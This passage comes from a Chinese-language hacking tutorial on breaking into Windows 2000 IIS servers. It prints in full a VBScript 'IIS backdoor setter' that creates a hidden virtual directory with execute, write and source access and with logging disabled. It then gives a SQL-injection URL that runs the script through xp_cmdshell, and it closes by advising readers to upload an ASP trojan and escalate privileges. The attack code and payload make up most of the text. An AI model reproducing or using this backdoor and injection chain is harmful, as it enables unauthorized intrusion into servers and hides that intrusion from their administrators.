将它用Echo写到服务器的一个根目录下如D:\然后运行即可。其实如果对方使用的是标准的Windows 2000服务器,直接使用动鲨的IIS.vbs建立IIS隐藏后门就可以了,代码如下:
help1="IIS后门设置器 FOR WIN2000 BY 动鲨 3月3号2004 年"
help2="请输入正确的虚拟目录名称和映射的路径,格式如下"
help3=" cscript.exe iis.vbs 虚拟目录的名称 映射的路径"
help4="例如: cscript.exe iis.vbs lh e:\"
set Args = Wscript.Arguments
if args.count < 2 then
wscript.echo help1
wscript.echo ""
wscript.echo help2
wscript.echo ""
wscript.echo help3
wscript.echo ""
wscript.echo help4
wscript.quit
end if
strVRName=args(0) ‘‘虚拟目录名称
strRootPath=args(1) ‘‘虚拟目录路径
Set checkVirtualDir=GetObject("IIS://LocalHost/W3SVC/1/Root")
For each VR in checkVirtualDir
if VR.Name="lhxy" Then
foundt ="yes"
else
foundt= "no"
End If
Next
if foundt ="yes" then
wscript.echo "发现已经创建了lhxy目录,正在设置自定义的虚拟目录"
creatvdir
else
wscript.echo "正在创建lhxy目录,以及自定义文件夹,请等待!"
creatlhxy
creatvdir
end if
wscript.echo "你创建的虚拟目录名称是"& strVRName &",映射的文件夹是 " & strRootPath &"。"
wscript.echo "请访问http://IP/lhxy/"& strVRName &"/ 来连接后门!"
wscript.echo "恭喜!后门设置全部完成!"
sub creatlhxy()
Set objDir=GetObject("IIS://LocalHost/W3SVC/1/Root")
Set myDir=objDir.Create("IISWebVirtualDir","lhxy")
myDir.AccessRead=true
myDir.DefaultDoc=mydir.DefaultDoc
myDir.AppIsolated=0
myDir.AccessExecute=true
myDir.DontLog=true
myDir.AccessSource=true
myDir.EnableDirBrowsing=true
myDir.setinfo
end sub
sub creatvdir()
Set objVirtualDir=GetObject("IIS://LocalHost/W3SVC/1/Root/lhxy")
Set VirDir=objVirtualDir.Create("IISWebVirtualDir",strVRName)
VirDir.AccessRead=true
VirDir.Path=strRootPath
VirDir.DefaultDoc=""
VirDir.AccessExecute=true
VirDir.AccessWrite=true
VirDir.AccessSource=true
VirDir.AppIsolated=0
VirDir.DontLog=true
VirDir.EnableDirBrowsing=true
VirDir.appcreate 0
VirDir.CreateProcessAsUser=0
VirDir.setInfo
end sub
wscript.quit
将它用Echo命令写到服务器上然后提交如下URL:
http://www.target.com/show.asp?id=1234;exec master.dbo.xp_cmdshell ‘cscript iis.vbs llikz d:\‘;--
即可建立一个隐藏的虚拟目录,不过这种方法只能对付Windows 2000系统,而且据我实验,成功率不高。不过它的优势也非常明显:不依赖Adminscrips下的VBS脚本,独立性很强。
得到物理路径后入侵就简单多了,上传ASP木马想办法提升权限就可以了。本文只是提出了几个比较另类的得到物理路径的办法,或许在普通情况下没有太多的意义,但在防护特别严密、管理员特别BT的服务器上,不妨试下文章中的方法,相信一定会有收获